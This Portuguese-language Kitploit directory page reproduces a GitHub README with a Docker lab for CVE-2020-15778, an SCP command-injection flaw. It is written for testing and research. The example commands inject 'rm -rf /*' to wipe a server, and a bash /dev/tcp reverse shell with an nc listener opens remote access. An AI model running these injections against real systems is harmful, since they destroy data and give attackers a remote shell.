Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-15778 — Reproduz o exploit CVE-2020-15778 de injeção de comando SCP com configuração cliente-servidor baseada em Docker para testar execução remota de código e payloads de shell reverso. | Kitploit
Ferramentas/GitHubGitHub/yifanzhg/cve-2020-15778
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

Reproduz o exploit CVE-2020-15778 de injeção de comando SCP com configuração cliente-servidor baseada em Docker para testar execução remota de código e payloads de shell reverso.

Ver Repositório
33há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-15778

Introdução

Este repositório reproduz CVE-2020-15778.

Passos

  1. Construa as imagens docker para o servidor e cliente scp
root@kitploit:~
cd client
docker build -t client-cve .
root@kitploit:~
cd server
docker build -t server-cve .
  1. Inicie o servidor scp em um container.
root@kitploit:~
docker run -d -P --name scp-server server-cve

Obtenha o endereço IP interno do servidor scp através de

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. Execute o cliente em um container.
root@kitploit:~
docker run --name scp-client -i -t client-cve
  1. Injete seu próprio comando shell no servidor scp chamando o comando scp no cliente.

No terminal do cliente, execute

root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'

A senha é "PASSWORD".

Exemplos

Aqui estão alguns exemplos para esta exploração.

  1. Apague tudo no servidor para travá-lo.
root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
  1. Reflita o bash do servidor scp para o cliente (imitando ssh).

Escute uma porta na máquina cliente.

root@kitploit:~
nc -lvvp 8080

Use scp para forçar o servidor a mapear o bash interativo para a máquina cliente.

root@kitploit:~
scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'

O endereço IP do cliente pode ser obtido através de

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
Baixar ferramenta